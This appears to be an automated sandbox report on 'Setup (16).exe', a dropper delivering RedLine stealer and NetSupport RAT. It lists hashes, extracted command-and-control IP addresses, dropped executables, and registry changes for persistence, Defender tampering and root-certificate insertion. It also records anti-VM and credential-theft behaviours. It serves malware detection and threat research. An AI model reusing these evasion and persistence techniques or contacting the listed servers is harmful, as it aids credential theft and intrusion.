netsupport | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

Target

Setup (16).exe
Size

631KB
MD5

cb927513ff8ebff4dd52a47f7e42f934
SHA1

0de47c02a8adc4940a6c18621b4e4a619641d029
SHA256

fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
SHA512

988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Score

10^/10

netsupport redline 1 22.08 dibild2 discovery evasion infostealer persistence rat spyware stealer themida trojan

Malware Config

Extracted

Family

redline

Botnet

37.0.8.88:44263

Extracted

Family

redline

Botnet

dibild2

135.148.139.222:1494

Extracted

Family

redline

Botnet

22.08

95.181.172.100:55640

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3640	3688	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7712	3688	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8428	3688	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6984	3688	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 9 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Documents\8VmzjVht_DClLCJG_RJh5V4E.exe	family_redline
C:\Users\Admin\Documents\5XHdUK3CmLKAHDrBaHQzFR94.exe	family_redline
C:\Users\Admin\Documents\5XHdUK3CmLKAHDrBaHQzFR94.exe	family_redline
behavioral16/memory/4692-237-0x0000000000400000-0x0000000000448000-memory.dmp	family_redline
behavioral16/memory/4848-253-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral16/memory/4848-258-0x000000000041A616-mapping.dmp	family_redline
behavioral16/memory/4732-247-0x000000000041A6E6-mapping.dmp	family_redline
behavioral16/memory/4732-240-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
C:\Users\Admin\Documents\8VmzjVht_DClLCJG_RJh5V4E.exe	family_redline

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 4976 created 4148 4976 WerFault.exe Hke7Np3HCf3BHr3IQJqdiMka.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Downloads MZ/PE file

description	pid	process	target process
PID 4976 created 4148	4976	WerFault.exe	Hke7Np3HCf3BHr3IQJqdiMka.exe

Executes dropped EXE 61 IoCs

Processes:

onR8itfYViCRadwknZWvxq1a.exeknDM9K2WuDIgPpvZTz7iJyiv.exe7L7SmCmxZBuK866H9J56dZ9i.exewYHXVXkFz5ne2Vq6ab0DG5k3.exepmraugcfGvbfWwNKMGckSwss.exeYfaqickjSQEwGsn4tTZyes3_.exeP2jRvKFkhoFqiCE2FzuSofFu.exe8N7tugtAoWe9lbLX05F7nk6f.exewpjiSuP2zkRSF5LjZiDIMr7J.exep677u7IwPoa5s4gcdt8zN2Yk.exeZleAaxLiBY5xMwGlObFp_7l2.exesYC7WokZSkdkVMNtIgLEIsRL.exe888qQtt12NDSY2tU8zniAWFT.exeOlLnyMjDYM2HF94iR5guLlDE.exe4tMCbZ0yGruE8d0Ny9jeWOfq.exe8VmzjVht_DClLCJG_RJh5V4E.exexvTYZ1hjTDj5Rr5UfraK7e1b.exe0vwfJ_G6kZ5XuDO0BlYvi3cn.exeaSn9fqpqDhGYu3GbZ1S1TS6I.exedsmuEcIl37bzLp4Drmm1l74f.exeYtjpPTrrwUN8IYNue5FqWCqm.exeGFXV5uf_XQa804CDnoWH0M3p.exefIAkXcZipnfF7F6wfSKwz046.exeHke7Np3HCf3BHr3IQJqdiMka.exe5XHdUK3CmLKAHDrBaHQzFR94.exejooyu.exemd8_8eus.execustomer3.exemsiexec.exeVU1EDKbEK8gfqyvnCHOs4E4z.tmpxvTYZ1hjTDj5Rr5UfraK7e1b.exeknDM9K2WuDIgPpvZTz7iJyiv.exeaSn9fqpqDhGYu3GbZ1S1TS6I.exeZleAaxLiBY5xMwGlObFp_7l2.exeYfaqickjSQEwGsn4tTZyes3_.exehBS_VbW.EXEjfiag3g_gg.exe6641540.exe1486191.exe3187448.exe8N7tugtAoWe9lbLX05F7nk6f.exe8011660.exeEsplorarne.exe.com11111.exeWinHoster.exerunvd.exeInlog.exeCleaner Installation.exeWEATHER Manager.exeInlog.tmpVPN.exeaskinstall53.exeEsplorarne.exe.comEsplorarne.exe.comrCbCiUdQSdSKQbtldclFAOsT.exe11111.exetapinstall.exeeTAuEb4oya06vxJ793JUQkse.exeLivelyScreenRecS1.9.exeEsplorarne.exe.comxtect12.exe

pid	process
4012	onR8itfYViCRadwknZWvxq1a.exe
3276	knDM9K2WuDIgPpvZTz7iJyiv.exe
1068	7L7SmCmxZBuK866H9J56dZ9i.exe
1072	wYHXVXkFz5ne2Vq6ab0DG5k3.exe
3744	pmraugcfGvbfWwNKMGckSwss.exe
3728	YfaqickjSQEwGsn4tTZyes3_.exe
2560	P2jRvKFkhoFqiCE2FzuSofFu.exe
2676	8N7tugtAoWe9lbLX05F7nk6f.exe
1656	wpjiSuP2zkRSF5LjZiDIMr7J.exe
2680	p677u7IwPoa5s4gcdt8zN2Yk.exe
3172	ZleAaxLiBY5xMwGlObFp_7l2.exe
1308	sYC7WokZSkdkVMNtIgLEIsRL.exe
192	888qQtt12NDSY2tU8zniAWFT.exe
3252	OlLnyMjDYM2HF94iR5guLlDE.exe
776	4tMCbZ0yGruE8d0Ny9jeWOfq.exe
3724	8VmzjVht_DClLCJG_RJh5V4E.exe
1928	xvTYZ1hjTDj5Rr5UfraK7e1b.exe
1316	0vwfJ_G6kZ5XuDO0BlYvi3cn.exe
2716	aSn9fqpqDhGYu3GbZ1S1TS6I.exe
2892	dsmuEcIl37bzLp4Drmm1l74f.exe
3748	YtjpPTrrwUN8IYNue5FqWCqm.exe
3440	GFXV5uf_XQa804CDnoWH0M3p.exe
3784	fIAkXcZipnfF7F6wfSKwz046.exe
4148	Hke7Np3HCf3BHr3IQJqdiMka.exe
4220	5XHdUK3CmLKAHDrBaHQzFR94.exe
4400	jooyu.exe
4436	md8_8eus.exe
4476	customer3.exe
4604	msiexec.exe
4760	VU1EDKbEK8gfqyvnCHOs4E4z.tmp
4832	xvTYZ1hjTDj5Rr5UfraK7e1b.exe
4692	knDM9K2WuDIgPpvZTz7iJyiv.exe
4732	aSn9fqpqDhGYu3GbZ1S1TS6I.exe
4848	ZleAaxLiBY5xMwGlObFp_7l2.exe
3712	YfaqickjSQEwGsn4tTZyes3_.exe
1472	hBS_VbW.EXE
3812	jfiag3g_gg.exe
4408	6641540.exe
304	1486191.exe
3644	3187448.exe
3860	8N7tugtAoWe9lbLX05F7nk6f.exe
488	8011660.exe
5352	Esplorarne.exe.com
5388	11111.exe
5424	WinHoster.exe
5636	runvd.exe
5676	Inlog.exe
5704	Cleaner Installation.exe
5748	WEATHER Manager.exe
5804	Inlog.tmp
5832	VPN.exe
5856	askinstall53.exe
5884	Esplorarne.exe.com
6048	Esplorarne.exe.com
6076	rCbCiUdQSdSKQbtldclFAOsT.exe
6092	11111.exe
6140	tapinstall.exe
6128	eTAuEb4oya06vxJ793JUQkse.exe
5348	LivelyScreenRecS1.9.exe
5460	Esplorarne.exe.com
4432	xtect12.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

5XHdUK3CmLKAHDrBaHQzFR94.exe8VmzjVht_DClLCJG_RJh5V4E.exesYC7WokZSkdkVMNtIgLEIsRL.exeGFXV5uf_XQa804CDnoWH0M3p.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5XHdUK3CmLKAHDrBaHQzFR94.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8VmzjVht_DClLCJG_RJh5V4E.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8VmzjVht_DClLCJG_RJh5V4E.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sYC7WokZSkdkVMNtIgLEIsRL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sYC7WokZSkdkVMNtIgLEIsRL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	GFXV5uf_XQa804CDnoWH0M3p.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	GFXV5uf_XQa804CDnoWH0M3p.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5XHdUK3CmLKAHDrBaHQzFR94.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Setup (16).exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Setup (16).exe

Loads dropped DLL 13 IoCs

Processes:

0vwfJ_G6kZ5XuDO0BlYvi3cn.exeVU1EDKbEK8gfqyvnCHOs4E4z.tmponR8itfYViCRadwknZWvxq1a.exeCleaner Installation.exeInlog.tmpEsplorarne.exe.comcmd.exetapinstall.exeEsplorarne.exe.com

pid	process
1316	0vwfJ_G6kZ5XuDO0BlYvi3cn.exe
4760	VU1EDKbEK8gfqyvnCHOs4E4z.tmp
4760	VU1EDKbEK8gfqyvnCHOs4E4z.tmp
4012	onR8itfYViCRadwknZWvxq1a.exe
5704	Cleaner Installation.exe
5804	Inlog.tmp
5804	Inlog.tmp
6048	Esplorarne.exe.com
6048	Esplorarne.exe.com
3756	cmd.exe
6140	tapinstall.exe
6140	tapinstall.exe
5460	Esplorarne.exe.com

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 13 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Documents\sYC7WokZSkdkVMNtIgLEIsRL.exe	themida
C:\Users\Admin\Documents\8VmzjVht_DClLCJG_RJh5V4E.exe	themida
C:\Users\Admin\Documents\OlLnyMjDYM2HF94iR5guLlDE.exe	themida
C:\Users\Admin\Documents\OlLnyMjDYM2HF94iR5guLlDE.exe	themida
C:\Users\Admin\Documents\5XHdUK3CmLKAHDrBaHQzFR94.exe	themida
C:\Users\Admin\Documents\GFXV5uf_XQa804CDnoWH0M3p.exe	themida
C:\Users\Admin\Documents\5XHdUK3CmLKAHDrBaHQzFR94.exe	themida
behavioral16/memory/3724-224-0x0000000001040000-0x0000000001041000-memory.dmp	themida
behavioral16/memory/1308-228-0x0000000001240000-0x0000000001241000-memory.dmp	themida
behavioral16/memory/3440-245-0x0000000000F90000-0x0000000000F91000-memory.dmp	themida
C:\Users\Admin\Documents\sYC7WokZSkdkVMNtIgLEIsRL.exe	themida
C:\Users\Admin\Documents\8VmzjVht_DClLCJG_RJh5V4E.exe	themida
C:\Users\Admin\Documents\GFXV5uf_XQa804CDnoWH0M3p.exe	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

1486191.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	1486191.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

sYC7WokZSkdkVMNtIgLEIsRL.exeGFXV5uf_XQa804CDnoWH0M3p.exe5XHdUK3CmLKAHDrBaHQzFR94.exe8VmzjVht_DClLCJG_RJh5V4E.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sYC7WokZSkdkVMNtIgLEIsRL.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	GFXV5uf_XQa804CDnoWH0M3p.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5XHdUK3CmLKAHDrBaHQzFR94.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8VmzjVht_DClLCJG_RJh5V4E.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

405 ipinfo.io
32 ipinfo.io
148 ip-api.com
152 ipinfo.io
154 ipinfo.io
223 ipinfo.io
224 ipinfo.io
225 ipinfo.io
31 ipinfo.io
403 ipinfo.io
231 ipinfo.io
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

8VmzjVht_DClLCJG_RJh5V4E.exesYC7WokZSkdkVMNtIgLEIsRL.exeGFXV5uf_XQa804CDnoWH0M3p.exe5XHdUK3CmLKAHDrBaHQzFR94.exe

pid process

3724 8VmzjVht_DClLCJG_RJh5V4E.exe
1308 sYC7WokZSkdkVMNtIgLEIsRL.exe
3440 GFXV5uf_XQa804CDnoWH0M3p.exe
4220 5XHdUK3CmLKAHDrBaHQzFR94.exe

flow	ioc
405	ipinfo.io
32	ipinfo.io
148	ip-api.com
152	ipinfo.io
154	ipinfo.io
223	ipinfo.io
224	ipinfo.io
225	ipinfo.io
31	ipinfo.io
403	ipinfo.io
231	ipinfo.io

pid	process
3724	8VmzjVht_DClLCJG_RJh5V4E.exe
1308	sYC7WokZSkdkVMNtIgLEIsRL.exe
3440	GFXV5uf_XQa804CDnoWH0M3p.exe
4220	5XHdUK3CmLKAHDrBaHQzFR94.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

aSn9fqpqDhGYu3GbZ1S1TS6I.exeZleAaxLiBY5xMwGlObFp_7l2.exeYfaqickjSQEwGsn4tTZyes3_.exe

description	pid	process	target process
PID 2716 set thread context of 4732	2716	aSn9fqpqDhGYu3GbZ1S1TS6I.exe	aSn9fqpqDhGYu3GbZ1S1TS6I.exe
PID 3172 set thread context of 4848	3172	ZleAaxLiBY5xMwGlObFp_7l2.exe	ZleAaxLiBY5xMwGlObFp_7l2.exe
PID 3728 set thread context of 3712	3728	YfaqickjSQEwGsn4tTZyes3_.exe	YfaqickjSQEwGsn4tTZyes3_.exe

Drops file in Program Files directory 19 IoCs

Processes:

p677u7IwPoa5s4gcdt8zN2Yk.exeEsplorarne.exe.com

description	ioc	process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	p677u7IwPoa5s4gcdt8zN2Yk.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	p677u7IwPoa5s4gcdt8zN2Yk.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jooyu.exe	p677u7IwPoa5s4gcdt8zN2Yk.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	p677u7IwPoa5s4gcdt8zN2Yk.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe	Esplorarne.exe.com
File created	C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\Company\NewProduct\customer3.exe	p677u7IwPoa5s4gcdt8zN2Yk.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe	Esplorarne.exe.com
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe	Esplorarne.exe.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 10 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1764	2560	WerFault.exe	P2jRvKFkhoFqiCE2FzuSofFu.exe
4976	4148	WerFault.exe
4876	2560	WerFault.exe	P2jRvKFkhoFqiCE2FzuSofFu.exe
3272	2560	WerFault.exe	P2jRvKFkhoFqiCE2FzuSofFu.exe
3524	2560	WerFault.exe	P2jRvKFkhoFqiCE2FzuSofFu.exe
5684	2560	WerFault.exe	P2jRvKFkhoFqiCE2FzuSofFu.exe
4272	2560	WerFault.exe	P2jRvKFkhoFqiCE2FzuSofFu.exe
6032	2560	WerFault.exe	P2jRvKFkhoFqiCE2FzuSofFu.exe
4508	3744	WerFault.exe	pmraugcfGvbfWwNKMGckSwss.exe
5512	4012	WerFault.exe	onR8itfYViCRadwknZWvxq1a.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

YfaqickjSQEwGsn4tTZyes3_.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	YfaqickjSQEwGsn4tTZyes3_.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	YfaqickjSQEwGsn4tTZyes3_.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	YfaqickjSQEwGsn4tTZyes3_.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

2280 taskkill.exe
5968 taskkill.exe
4308 taskkill.exe

pid	process
2280	taskkill.exe
5968	taskkill.exe
4308	taskkill.exe

Modifies registry class 3 IoCs

Processes:

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Setup (16).exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Setup (16).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Setup (16).exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

7364 PING.EXE
5896 PING.EXE

pid	process
7364	PING.EXE
5896	PING.EXE

Script User-Agent 12 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	177	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	179	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	185	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	221	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	222	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	228	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	153	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	171	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	404	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	408	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	154	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	160	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup (16).exeYfaqickjSQEwGsn4tTZyes3_.exeWerFault.exeWerFault.exe

pid	process
3892	Setup (16).exe
3892	Setup (16).exe
3712	YfaqickjSQEwGsn4tTZyes3_.exe
3712	YfaqickjSQEwGsn4tTZyes3_.exe
2824
2824
2824
2824
1764	WerFault.exe
1764	WerFault.exe
1764	WerFault.exe
1764	WerFault.exe
1764	WerFault.exe
1764	WerFault.exe
1764	WerFault.exe
1764	WerFault.exe
1764	WerFault.exe
1764	WerFault.exe
1764	WerFault.exe
1764	WerFault.exe
1764	WerFault.exe
1764	WerFault.exe
1764	WerFault.exe
1764	WerFault.exe
1764	WerFault.exe
1764	WerFault.exe
1764	WerFault.exe
2824
2824
2824
2824
2824
2824
2824
2824
4976	WerFault.exe
4976	WerFault.exe
4976	WerFault.exe
4976	WerFault.exe
4976	WerFault.exe
4976	WerFault.exe
4976	WerFault.exe
4976	WerFault.exe
4976	WerFault.exe
4976	WerFault.exe
4976	WerFault.exe
4976	WerFault.exe
4976	WerFault.exe
4976	WerFault.exe
4976	WerFault.exe
4976	WerFault.exe
4976	WerFault.exe
4976	WerFault.exe
4976	WerFault.exe
2824
2824
2824
2824
2824
2824
2824
2824
2824
2824

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2824
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

YfaqickjSQEwGsn4tTZyes3_.exe

pid process

3712 YfaqickjSQEwGsn4tTZyes3_.exe

pid	process
2824

pid	process
3712	YfaqickjSQEwGsn4tTZyes3_.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

0vwfJ_G6kZ5XuDO0BlYvi3cn.exe8N7tugtAoWe9lbLX05F7nk6f.exe4tMCbZ0yGruE8d0Ny9jeWOfq.exesYC7WokZSkdkVMNtIgLEIsRL.exeWerFault.exeGFXV5uf_XQa804CDnoWH0M3p.exeaSn9fqpqDhGYu3GbZ1S1TS6I.exeWerFault.exeWerFault.exe7L7SmCmxZBuK866H9J56dZ9i.exeWerFault.exeknDM9K2WuDIgPpvZTz7iJyiv.exeZleAaxLiBY5xMwGlObFp_7l2.exe8VmzjVht_DClLCJG_RJh5V4E.exe6641540.exetaskkill.exewpjiSuP2zkRSF5LjZiDIMr7J.exeWerFault.exe5XHdUK3CmLKAHDrBaHQzFR94.exe8011660.exe3187448.exeaskinstall53.exe

description	pid	process
Token: SeDebugPrivilege	1316	0vwfJ_G6kZ5XuDO0BlYvi3cn.exe
Token: SeDebugPrivilege	2676	8N7tugtAoWe9lbLX05F7nk6f.exe
Token: SeDebugPrivilege	776	4tMCbZ0yGruE8d0Ny9jeWOfq.exe
Token: SeDebugPrivilege	1308	sYC7WokZSkdkVMNtIgLEIsRL.exe
Token: SeRestorePrivilege	1764	WerFault.exe
Token: SeBackupPrivilege	1764	WerFault.exe
Token: SeDebugPrivilege	3440	GFXV5uf_XQa804CDnoWH0M3p.exe
Token: SeDebugPrivilege	4732	aSn9fqpqDhGYu3GbZ1S1TS6I.exe
Token: SeShutdownPrivilege	2824
Token: SeCreatePagefilePrivilege	2824
Token: SeShutdownPrivilege	2824
Token: SeCreatePagefilePrivilege	2824
Token: SeShutdownPrivilege	2824
Token: SeCreatePagefilePrivilege	2824
Token: SeDebugPrivilege	1764	WerFault.exe
Token: SeDebugPrivilege	4976	WerFault.exe
Token: SeDebugPrivilege	4876	WerFault.exe
Token: SeDebugPrivilege	1068	7L7SmCmxZBuK866H9J56dZ9i.exe
Token: SeShutdownPrivilege	2824
Token: SeCreatePagefilePrivilege	2824
Token: SeShutdownPrivilege	2824
Token: SeCreatePagefilePrivilege	2824
Token: SeShutdownPrivilege	2824
Token: SeCreatePagefilePrivilege	2824
Token: SeShutdownPrivilege	2824
Token: SeCreatePagefilePrivilege	2824
Token: SeShutdownPrivilege	2824
Token: SeCreatePagefilePrivilege	2824
Token: SeShutdownPrivilege	2824
Token: SeCreatePagefilePrivilege	2824
Token: SeShutdownPrivilege	2824
Token: SeCreatePagefilePrivilege	2824
Token: SeShutdownPrivilege	2824
Token: SeCreatePagefilePrivilege	2824
Token: SeDebugPrivilege	3272	WerFault.exe
Token: SeDebugPrivilege	4692	knDM9K2WuDIgPpvZTz7iJyiv.exe
Token: SeDebugPrivilege	4848	ZleAaxLiBY5xMwGlObFp_7l2.exe
Token: SeDebugPrivilege	3724	8VmzjVht_DClLCJG_RJh5V4E.exe
Token: SeDebugPrivilege	4408	6641540.exe
